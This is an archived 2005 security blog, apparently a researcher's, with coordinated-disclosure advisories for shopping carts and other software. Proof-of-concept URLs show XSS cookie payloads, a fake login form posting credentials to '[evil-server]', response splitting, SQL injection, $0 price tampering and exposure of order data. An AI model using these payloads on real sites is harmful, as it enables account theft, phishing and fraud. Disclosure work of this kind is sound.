Google Adsense multiple variable XSS

Saturday, April 30, 2005
#####################################################
Google Adsense multiple variable XSS
vendor url:https://www.google.com/adsense/?hl=en_US
advisore: http://lostmon.blogspot.com/2005/05/
google-adsense-multiple-variable-xss.html
vendor notify: yes exploit available: yes
######################################################

Google AdSense is a fast and easy way for website publishers of all
sizes to display relevant Google ads on their website's content
pages and earn money

Google AdSense contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly 'client' , 'hl' , 'client' , 'adU', 'adT',
'exp' and 'done' variables upon submission to the 'pagead/ads'
and 'feedback/abg' scripts.This could allow a user to create a
specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and the
server,leading to a loss of integrity.

#########
solution:
##########

Aparently all are pached !!!

#############
timeline:
#############

discovered: 28 april 2005
vendor notified: 29 april 2005
vendor response: 29 april 2005 (autoresponder)
vendor response: 30 april 2005 (email)
fix: 30 april 2005
disclosure: 1 may 2005

#################
proof of concept:
#################
I try the ad´s show in Bandaancha.st because
i like the information provide by this web :DDDD
--

###################
software used
##################
windows 2000 sp4 all fixes
ie 6.0 all fixes
google toolbar 2.0.114.9 big/es
Netcraft toolbar 1.4.1
--
in this case the ad´s displayed are "tipical" related shopping carts
--

http://pagead2.googlesyndication.com/pagead/ads?client=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3Eca-pub-701951298956
4856&dt=1114800478343&lmt=1114800477&format=fp_al_lp
&output=html&channel=8235212864&url=http%3A%2F%2Fwww
.soft32.com%2Fdow nload-publisher-80337-3.html&ref=http%3A%2F
%2Fwww.soft32.com%2Fdownload_80337.html&u_h=768&u_w=
1024&u_ah=740&u_aw=1024&u_cd=32&u_tz=120&u_his
=4&u_java=true&u_nplug=25&u_nmime=93&kw_type=broad
&prev_fmts=180x90_0ads_al_s&rt=ChBCcoJ7AAm3zAoSZDJjsh4zEhl
GcmVlIFBheVBhbCBTaG9wcGluZyBDYXJ0Ggj8cRRPG6sWqA&hl=en

diferent variables afected.

'hl' , 'client' , 'adU', 'adT', 'exp' and ' 'done' aparently afected.

http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl="><strong><h1>Lostmon
_was_here!!</h1></strong>es&client=ca-pub-42070770121
30458&adU=www.abeltronica.com&adT=Prueba+Gratis+su+Internet&ad
U=www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=Marketingy
Comercio.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.
com&adT=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaan
cha.st/index.php&hl=es&client="><strong><h1>
;Lostmon_was_here!!!</h1></strong>ca-pub-4207077012
130458&adU=www.abeltronica.com&adT=Prueba+Gratis+su+Internet&ad
U=www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyCom
ercio.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.co
m&adT=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl=es&client=ca-pub-4207077012130458&adU="
><strong><h1>Lostmon_was_here!!!</h1></s
trong>www.abeltronica.com&adT=Prueba+Gratis+su+Internet&adU=w
ww.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyComerci
o.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.com&adT
=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl=es&client=ca-pub-4207077012130458&adU=www.ab
eltronica.com&adT="><strong><h1>Lostmon_was
_here!!</h1></strong>Prueba+Gratis+su+Internet&adU=
www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyComerc
io.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.com&ad
T=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


(Yet another) Google Cross Site Scripting

################ End #####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org

ViArt Shop Enterprise multiple variable XSS

Friday, April 29, 2005
#########################################################
ViArt Shop Enterprise multiple variable XSS
vendor: http://www.codetosell.com
advisory:http://lostmon.blogspot.com/2005/04/
viart-shop-enterprise-multiple.html
vendor informed: yes exploit available:yes
OSVDB ID:15951, 15952 ,15953, 15954 , 15955 , 15956 , 15957, 15958
Securitytracker:1013853
Secunia:SA15181
BID:13462
#########################################################

ViArt Shop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple variables upon submission to the multiple scripts.
This could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.

##########
versions:
##########

ViArt Shop Enterprise v.2.1.6 afected
also is posible prior versions are afected too.

##########
Solution:
##########

Update to version ViArt Shop version 2.1.8

#########
timeline:
#########

discovered : 25 april 2005
vendor notify :28 april 2005
vendor response :18-10-2005
vendor fix:05-05-2005
disclosure:29 april 2005

########## Proof of concept ##############
############
basket.php
###########

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0
[XSS-CODE]%26search_string%3Dss%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3D[XSS-CODE]%26search_string%3Dss%26
search_category_id%3D%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id
%3D0%26search_string%3Dss%26search_string%3Dss%26
search_category_id[XSS-CODE]%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26
search_category_id%3D[XSS-CODE]%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26search_category_id%3D
%26search_category_id%3D[XSS-CODE]

###########
forum.php
###########

http://[victim]/forum_new_thread.php

form fields nickname,email,topic and message are vulnerables to XSS

for exploiting email you can use:
[XSS-CODE]@email.com or email@[XSS-CODE].com

http://[victim]/forum_thread.php?thread_id=2

wen reply to a post nickname and message fields are vulnerable to XSS

all of this codes are executed wen a user view the forum or wen admin
look in "admin panel" for "forum threads" in forum menu

###########
page.php
###########

http://[victim]/page.php?page=about%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/page.php?page=%3Cp%3Ean%20eror%20was%20send
%20to%20webmaster,%20please%20insert%20your%20username%20
and%20password%20,%20and%20continue%20shopping%20%3Cform
%20action=%22http://[evil-server]/save.php%22%20method=%22
post%22%3EUsername:%3Cinput%20aame=%22username%22%20type
=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3C
input%20name=%22password%22%20type=%22text%22%20maxlength
=%2230%22%3E%3Cbr%3E%3Cinput%20name=%22login%22%20type=
%22submit%22%20value=%22Login%22%3E%3C/form%3E


############
reviews.php
############

http://[victim]/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://[victim]/reviews.php?category_id=0[XSS-CODE]&item_id=4

http://[victim]/reviews.php?filter=0&item_id=4
[XSS-CODE]&category_id=0

#################
products.php
#################

http://[victim]/product_details.php?item_id=4
&category_id=0[XSS-CODE]


http://[victim]/products.php?category_id=13[XSS-CODE]

http://[victim]/products.php?category_id=0&search_string=
[XSS-CODE]&search_category_id=

##################
news_view.php
##################

http://[victim]/news_view.php?news_id=3&rp=
news.php[XSS-CODE]&page=1

http://[victim]/news_view.php?news_id=3&rp=
news.php&page=1[XSS-CODE]

################# end #########################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.

Amazon webstore script injection and XSS

Thursday, April 28, 2005
#########################################################
Amazon webstore script injection and XSS
vendor:http://scripts.justwilliams.com/amazon/index.htm
advisory:http://lostmon.blogspot.com/2005/04/
amazon-webstore-script-injection-and.html
vendor informed: yes exploit available:yes
OSVDB ID:15892 , 15893 and 15894
Secunia: SA15155
BID: 13419 , 13425, 13426 , 13427 , 13428
Securitytracker:1013836
#########################################################


Amazon Webstore is a project that is currently being developed
at JustWilliam's. It is written in PHP and is designed to interface
with Amazon's vast database of products

Amazon Webstore contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'image' or 'currentIsExpanded''searchFor'and 'currentNumber'
upon submission to the 'index.php'and 'closeup.php' scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.


##########
versions:
##########

Amazon Webstore Version 04050100

also is posible prior versions are afected.
#########
Solution:
#########

no solution at this time

##########
timeline:
##########

discovered: 25 april 2005
vendor notify: 26 april 2005
vendor response:
vendor fix:
disclosure:28 april 2005

##########
exploits :
##########

http://[victim]/store/uk/product/%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm

and server respose with this cookie :

ourhistory[uk]
a%3A1%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert
%28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7B
s%3A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+
-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
2981060096
29706949
933228160
29706915
*
them if we try to inject a malicious javascript it is execute
everytime what we navigate on a link of the page.

http://[victim]/store/uk/product/">%0d%0aSet-Cookie:%20
HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm

and server respond with cookie:

ourhistory[uk]
a%3A1%3A%7Bs%3A56%3A%22asin-%0D%0ASet-Cookie%3A
+HTTP_response_splitting%3DYES%0D%0AFoo%3A+bar%22%
3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A20%3A%22-+No
+product+found+-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
1656289024
29706956
995487088
29706922
*

if we inject first url and after the second the server set this cookie:

ourhistory[uk]
a%3A3%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert%
28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7Bs%3
A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+-%22%3
Bs%3A1%3A%22i%22%3BN%3B%7Ds%3A15%3A%22asin-B00004UAFX
%22%3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A17%3A%22Story+
Book+Weaver%22%3Bs%3A1%3A%22i%22%3Bs%3A63%3A%22http%3
A%2F%2localhost%2Fimages%2FP%2FB00004UAFX.02.THUMBZZ
localhost/
1536
1656289024
29706956
995487088
29706922
*
######################
XX on others scripts
######################


http://[victim]/closeup.php?image=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E


http://[victim]/index.php?currentIsExpanded=0%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E¤tNumber=8

http://[victim]/index.php?function=search&searchFor=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


http://[victim]/uk/list/c/software_CAD_Technical_60002_uk.htm?
currentNumber=4.3%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E¤tIsExpanded=0

http://[victim]/index.php?country=uk
&function=search&searchFor='%20';!--%22%3CCSS_Check%3E=&{()}
&goButton=go&mode=books

is posible to others scripts are vulnerables too

################# End ###################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.

How safe is shopping on internet

Wednesday, April 27, 2005
In the latest days, they are possible to be read in different sites,
the news on the increase of the Phishing, today I want to raise a
reflection, whichever safe is to buy today in Internet in day?

Diabolic Crab has reported multitude of vulnerabilities in different
systems based on virtual stores, i myself I have reported some of
them,and others "vulns finders" and today considers to me cueston
to where have part of fault vendors or developers of software of
these increases of phishing?

Is trustworthy the content that this seeing or has been manipulated
before arriving at you? the developers of software day to day need a
new figure that is appraised in Internet "aplications to tester"
understood in looking for the new vulnerabilities in new products and
new programming languages...

A simple failure of validation can may to get to be reason for phishing
in its product? is a reality what the user in the purchases by Internet
are trusted when day to day they see themselves and continue seeing
that in if many of mayor products or CMS for e-comerce are not reliable even.

atentamente :
Lostmon (Lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.

PHPCart price manipulation

Tuesday, April 26, 2005
###############################################
PHPCart order price manipulation
vendor url: www.phpcart.net
advisory:http://lostmon.blogspot.com/2005/04/
phpcart-price-manipulation.html
vendor notify: yes exploit available: yes
OSVDB ID:15859
BID:13406
Secunia: SA15147
Securitytracker:1013892
################################################

PHPCart is a simple shopping system for small web-merchants
.Set-up of PHPCart is quick and easy, and does not require a database.

PHPcart contains a flaw that allows a price manipulation wen order a
product.This flaw exists because the application does not validate
'price' , 'postage' variables upon submission to the 'phpcart.php'
script. This could allow a user to create a specially crafted URL that
can shop some products at 0$, leading to a loss of integrity.


versions:

3.2 afected
3.3 not tested

also is posible all vesions prior to 3.2 are vulnerables.

##########
solution:
##########

upgrade to version 3.3 (not tested)
this version is not tested and is also posible to be vulnerable too.


##########
timeline
##########

discovered:25 april 2005
vendor notify 26 april 2005
vendor response:
vendor fix:
disclosure:27 april 2005


#####################
Proof of concept:
#####################


for exploiting this issue :

1 click in "add to cart" button on product what you are interested
the link have a similar looks :

http://[victim]/phpcart.php?action=add&id=1002&descr=Mobile%20
Phone&price=35.0&postage=10&quantity=1

if we look we have this variables ==>&price=35.0&postage=10 this is
the price of the product and the post cost.

in your cart you have now a product.

2. click on "view basket" and you have your product ... delete it and
click on this manipulate URL:

http://[victim]/phpcart.php?action=add&id=1002&descr=Mobile%20
Phone&price=0&postage=&quantity=100

we manipulate 'price' , 'postage' and 'quantity' and now if we look our
basket we have 100 products shopping at cost 0$


############### End ####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

OneWorldStore user information disclosure

Sunday, April 24, 2005
##############################################
OneWorldStore user order information disclosure
vendor urL: http://www.oneworldstore.com/
advisory:http://lostmon.blogspot.com/2005/04/
oneworldstore-user-information.html
vendor confirmed: yes exploit available:yes
OSVDB ID:15781
Secunia: SA15104
Securitytracker:1013796
BID:13361
###############################################

vendor security url :
http://oneworldstore.com/support_security_issue_updates.asp
#April_24_2005_Lostmon


OneWorldStore contains a flaw that may lead to an unauthorized
information disclosure. The issue is triggered when a remote user
manipulates the value of variable 'idOrder' upon submit to
'PaymentMethods/owOfflineCC.asp' script occurs, which will
disclose name on credit card and the address from buyers this
information resulting in a loss of confidentiality.



versions :

OneWorldStore™ Free Store
OneWorldStore™ Basic Store
OneWorldStore™ SOHO Store
OneWorldStore™ Business Store
OneWorldStore™ Enterprise Store

#########
solution:
#########

vendor´s Patch :
http://oneworldstore.com/support_updates.asp

#########
timeline
#########

discovered on :24 april 2005
vendor notify 24 april 2005
vendor response 24 april 2005
vendor fix : 24 april 2005 ( 1 hour later WoW)
disclosure: 25 april 2005
##############
Proof of concept
##############


http://[victim]/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=1
http://[victim]/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=2
http://[victim]/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=3
http://[victim]/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to vendor very fast respose and very fast release a fix good work !!


--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

OneWorldStore Critical Failure

Wednesday, April 20, 2005
################################################
OneWorldStore Critical Failure
vendor url:http://oneworldstore.com/
advisory:http://lostmon.blogspot.com/2005/04/
oneworldstore-critical-failure.html
vendor confirmed:yes exploit available: yes
OSVDB ID:15724
Secunia: SA15057
BID:13322
Securitytracker: 1013782
################################################

OneWorldStore contains a flaw that may allow a malicious user to
crash the application. The issue is triggered when a remote user
call directly '/owConnections/chksettings.asp' script occurs. It is
possible that the flaw may allow resulting in a loss of availability.

########
versions
#######

OneWorldStore basic
OneWorldStore free
OneWorldStore enterprise

########
solution:
########

OneWorldStore has release a wrokaround
http://www.oneworldstore.com/support_security_issue_updates.asp
#April_20_2005_Lostmon


workaround:

--delete (or rename) the /owConnections/chksettings.asp file.

timeline

discovered 19 april 2005
vendor notify 19 april 2005
vendor response:20 april 2005
vendor solution: 20 april 2005

proof of concept:

Failure method:

Run this file in a browser:
http://[domain name]/owConnections/chksettings.asp

Upon execution the site will shut down until a fix is applied. Each
site's fix is different. However, no data will be lost or exposed.

RESOULTION:
Delete the /owConnections/chksettings.asp prior to being hacked.

OneWorldStore Editions no longer use the /owConnections/chksettings.asp file.

this crashes the application, and a user can re-start only to step 2
without the fix..they need the fix to prevent it from happening
again

We would like to thank Lostmon for notifying us of these issues. Our
turnaround time for applying the fixes and releasing the patches was
approximately 5 hours. We have also asked him to post his advisory,
with our fix, on his website to help get the word out about the patch.
########### END ##############

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to vendor very fast respose and very fast release a fix good work !!
thnx to icaro he is investigate with me :D
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangle of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente...

PayProCart multiple variable XSS & path disclosure

###################################################
PayProCart multiple variable XSS & path disclosure
vendor:http://www.profitcode.net/products/payprocart.html
vendor confirmed: yes exploit avaible: yes
advisore:http://lostmon.blogspot.com/2005/04/
payprocart-multiple-variable-xss-path.html
OSVDB IDS:15528,15529,15530,15531,15532,15533,
15534,15535,15536,15537,15538
Secunia:SA15025
BID: 13299,13302.13303,13304,13305,
13306,13307,13308,13309
##################################################


found in a internal test wen documented latest vulnerabilities in
Profitcode PayProCart 3.0

PayProCart contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'username','chckoutaction','ckprvd' and 'pageID' upon submission
to the 'cart.php' and 'index.php' script.This could allow a user to create
a specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and the
server,leading to a loss of integrity.

Also in adminshop secction we found some flaws in 'hdoc','modID',
'taskID','proMod' variables, upon submission to the
'adminshop/index.php' script , 'mmactionComm' variable,upon
submission to the 'mmailer/index.php' script but it can only
exploiting for a autenticated admin.

Other scripts can be vulnerables to same attack style.

#########
versions
#########

3.0 vulnerable.
3.1 not tested

#############
solution:
#############

Upgrade to version 3.1 or higher, as it has been reported to fix this
vulnerability. An upgrade is required as there are no known workarounds.

some code features are change in PayProCart 3.1 and most bug fixes
the vendor´s continue working whith all of these flaws.

download update url: http://www.profitcode.net/products/payprocart-31.html

##########
timeline
##########

discovered: 6 april 2005
vendor notify: 7 april 2005
vendor respose:7 april 2005
disclosure: 15 april 2005
public disclosure: 20 april 2005


################
proof of concepts.
################
################################
index.php Multiple Variable XSS
################################

http://[target]/path_to_store/index.php?modID=uauthcfrm&cnfType=
muec"><script>alert(document.cookie)</script>
//need client login

http://[target]/path_to_store/index.php?modID=usrauthlogin&sgnuptype=
csaleID&username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script
%3E&errorMsgNum=301

http://[target]/path_to_store/index.php?modID=usrauthlogin[XSS-code]



############################
cart.php ckprvd Variable XSS
############################

http://[target]/path_to_store/cart.php?chckoutaction=1&ckprvd=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

##########################################
adminshop/index.php Multiple Variable XSS
##########################################

http://[target]/path_to_store/adminshop/index.php?hdoc=index
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/path_to-store/adminshop/index.php?taskID=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/path_to_store/adminshop/index.php?proMod=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/path_to_store/adminshop/index.php?modID=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

###########################################################
adminshop/mmailer/index.php mmactionComm Variable XSS
###########################################################

http://[target]/path_to_store/adminshop/mmailer/index.php?mmactionComm=
mmShowMailingLists%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

############################################
tplates/usrauthlogin.php username field XSS
############################################

http://[target]/path_to_store/index.php?modID=usrauthlogin&sgnuptype=
csaleID&username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script
%3E&errorMsgNum=301

########################################
Template function.main Path Disclosure
########################################

/tplates/csaleID.php
/tplates/emailconfirm.php
/tplates/grpcom.php
/tplates/help.php
/tplates/uauthcfrm.php
/tplates/usrcarts.php
/tplates/wsaleID.php

################################################
mailingsignup.php Direct Request Path Disclosure
################################################

/tplates/mailingsignup.php

###############################################
newitems.php Direct Request Path Disclosure
###############################################

/tplates/newitems.php

############################################
specials.php Direct Request Path Disclosure
############################################

/tplates/specials.php

########################################
/tplates/usrauthstamp.php IP Disclosure
########################################

http://[victim]/payprocart/index.php?modID=usrauthlogin&sgnuptype=
csaleID&username=%22%3E%3Ciframe%20src=http://[victim]/payprocart
/tplates/usrauthstamp.php%3E%3Ciframe%3E&errorMsgNum=301

(concern, used in conjunction with XSS)

#######################################################
mainincs/checkout_totaltrans.php Information Disclosure
#######################################################

http://[victim]/payprocart/index.php?modID=usrauthlogin&sgnuptype=
csaleID&username=%22%3E%3Ciframe%20src=http://[victim]/payprocart
/mainincs/checkout_totaltrans.php%3E%3Ciframe%3E&errorMsgNum=301

(concern, used in conjunction with XSS)

############################################
aff/index.php multiple variable XSS
############################################

http://[target]/path_to_store/aff/index.php?pageID=agreementENG
%22%3E%3h1%3Elalalal%3C/h1%3E
//need client login

http://[target]/path_to_store/aff/index.php?modID=clicks_graph
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
// nedd client login.

####### end #######

thnx to estrella to be my ligth
thnx to johnyd of PayProCart, very good vendor, he can be sure that if
needs to test something,one make this with taste:D
thnx to all http://www.osvdb.org Team
thnx to JxT and jericho for the support

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

OneWorldStore 'sIDSearch' DisplayResults.asp XSS and SQL injection

Monday, April 18, 2005
################################################
OneWorldStore DisplayResults.asp sIDSearch Variable XSS and SQL Injection
vendor url:http://oneworldstore.com/
vendor notified : yes exploit available: yes
advisory:http://lostmon.blogspot.com/2005/04/
oneworldstore-sidsearch.html
OSVDB ID: 15659 and 15660
Securitytracker:1013754
secunia:SA14969
BID:13251 and 13249
################################################

related vendor´s security bulletin:
http://oneworldstore.com/support_security_issue_updates.asp

Found during an internal test when documenting and testing latest
vulnerabilities found by Diabolic Crab ( reference:
http://www.digitalparadox.org/advisories/ows.txt)

good work Diabolic !!

oneWorldStore is a powerful desing asp shopping cart.

oneWorldStore contains a flaw that allows a remote cross site
scripting attack and sql inject comands.This flaw exists because
the application does not validate 'sIDSearch' upon submission to
the '/owSearch/DisplayResults.asp' script.This could allow a user
to create a specially crafted URL that would execute arbitrary code
in a user's browser within the trust relationship between the
browser and the server, leading to a loss of integrity.

##########
versions:
##########

OneWorldStore unknow version

some versions here:
http://oneworldstore.com/products_price_list.asp

also is posible what others versions are afected.

##########
solution:
##########

vendor´s fix/patch see :
http://www.oneworldstore.com/
support_security_issue_updates.asp


http://www.oneworldstore.com/support_updates.asp

http://www.oneworldstore.com/updatezips/Security
Update_Apr_18_2005_All_Editions.zip

timeline:

discovered : 15 april 2005
vendor notify : 18 april 2005 (web form)
vendor response: 18 april 2005
vendor patch/fix: 18 april 2005
disclosure: 18 april 2005

####################
proof of concept:
###################

SQL INJECTION:

http://[victim]/owSearch/DisplayResults.asp?sIDSearch=15%20or%201=1 //command execution !!

Cross-site scripting:

http://[victim]/owSearch/DisplayResults.asp?sIDSearch=15
"><META%20HTTP-EQUIV=Refresh%20CONTENT=0>

http://[victim]/owSearch/DisplayResults.asp?sIDSearch=1
"><h1>lalala</h1>

##########################
related vendor response :
##########################
From: Dean Higginbotham
To: Lostmon@gmail.com
Date: Apr 18, 2005 7:28 PM
Subject: RE: OneWorldStore Support Inquiry -- Technical

Lostmon,

I've applied several fixes to these files:
/owSearch/DisplayResults.asp
/owSearch/PrepareResults.asp
The fixes have been applied to all Editions.

Fixes include:
1. Converting all numeric inputs from form or QueryString text to
actual numeric data types. If the data is nonnumeric or blank,
it converts it to a 0.

2. Trimming all text inputs from form or QueryString. Trimming
keywords to 250 characters. Trimming flags to one character.
Trimming sort criteria (SOHO, Business & Enterprise only) to 20
characters.

3. Displaying all text that has passed through a form or QueryString
using the Server.HTMLEncode() filter.

I have also added these patched files to an update within our member
section on the site. In a few minutes I am also going to add it to our
security announcement page so people know about it:
http://www.oneworldstore.com/support_security_issue_updates.asp

Would you also still release your findings on your site? And say that
there is a patch on our site (I've also attached it to this email if you
would like to review it)? Because we want people who have downloaded
the Free and Basic Editions to be able to know about the patch. And we
do not have email addresses for any people who downloaded the Free
Edition, and very few for the Basic Edition.
####################################

############
thnx
############

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to vendor very fast respose and very fast release a fix good work !!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangle of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

comersus ASP shopping cart variable XSS

Tuesday, April 12, 2005
##############################################
comersus ASP shopping cart 'curPage' variable XSS
vendor url: www.comersus.com
advisore url:http://lostmon.blogspot.com/2005/04/
comersus-asp-shopping-cart-variable.html
vendor notified : yes exploit avaible: yes
OSVDB ID:15539
BID : 13125
Securitytracker: 1013747
##############################################

comersus has a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate 'curpage'
variable upon submission to 'comersus_searchItem.asp' script.This
could allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.

comersus versions:

3.90
4.00
4.14
4.20b
4.23
4.27
4.28
4.29
4.36
4,47
4.051
v6 beta not afected.

solution:

Upgrade to version v6 beta or higher, as it has been reported
to fix this vulnerability.An upgrade is required as there are
no known workarounds.

exploit:

http://[target]/store/comersus_searchItem.asp?strSearch=0&curPage=2
">%3Cscript%3Ealert(document.cookie)%3C/script%3E



thnx to estrella to be my ligth
thnx to all,day after day support me

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangle of: http://www.osvdb.org
La curiosidad es lo que hace mover la mente....

DeluxeFTP plain text passwords disclosure

Monday, April 11, 2005
###########################################
deluxeFTP plain text passwords disclosure
vendor url:http://www.deluxeftp.com/
vendor notified: yes exploit avaible: yes
advisore url:http://lostmon.blogspot.com/2005/04/
deluxeftp-plain-text-passwords.html
OSVDB ID: 15421
Secunia:SA14923
###########################################

DeluxeFTP contains a flaw that may lead to an unauthorized user
name and password exposure. It is possible to gain access to plain
text user name and password of the ftp sites configured when the
program writes its configuration in 'sites.xml' file, which may lead
to a loss of confidentiality.

##########
version:
##########

DeluxeFTP 6.0.1 afected.
DeluxeFTP Professional 7.0.1 beta afected


###########
solution:
###########

Currently, there are no known upgrades, patches, or workarounds
available to correct this issue.

###########
timeline:
###########

discovered: 09/04/2005
vendor notified: 10/04/2005
disclosure date: 11/04/2005

##########
exploit:
##########

c:\program files\DeluxeFTP\sites.xml
c:\program files\DeluxeFTP Professional\sites.xml

and in this file we look what wen we look for the sites what
we have configured we look this information:

<SITE name="Test">
<ADDRESS>PLAINTEXT_FTP_HOST</ADDRESS>
<PORT>21</PORT>
<PASVMODE>0</PASVMODE>
<LOGIN>PLAINTEXT_USERNAME</LOGIN>
<PASSWORD>PLAINTEX_PASSWORD</PASSWORD>
<REMOTEPATH />


########
thanks
########

thnx to estrella she is always in my mind
thnx to all who support me day at day

--
atentamente:

Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangle of: http://www.osvdb.org
La curiosidad es lo que hace mover la mente....

Pieces about me.

Sunday, April 10, 2005
After of almost a year from my first appearance, or my first advisory,
today I want to leave something about my interests my restlessness.
I am a normal boy of 35 years of age, interested in the informatics
world in the branch of the security that is evident; I never have
money to pay for an academic face to me formation and never
even let’s persecute that dream,the future, the technologic.
with many efforts y time gain a part of my goal, to know to
whatever on different systems, and since then I do what others did
not do with me, quick support in channels of IRC aid, resolutions
of problems, contribute articles to publications and webs, I distribute
the conclusions and analysis of some of the advisories that I publish
and attempt to help on the basis of my knowledge the developers
as far as possible.

That it is what interests to me? It interests to me to continue with my
formation and it interests to me to continue evolving towards a
greater and better knowledge of the systems, I like to specialize in
security in Web applications . this year after of a few sacrifices,
finally can may to make the course that always I wanted to do; but
that by lack of time and resources I could not... I hope to obtain I title
corresponding to.http://www.uoc.edu/masters/
if somebody wishes to esponsorice me or to contribute
to my formation I am "open" to ideas.

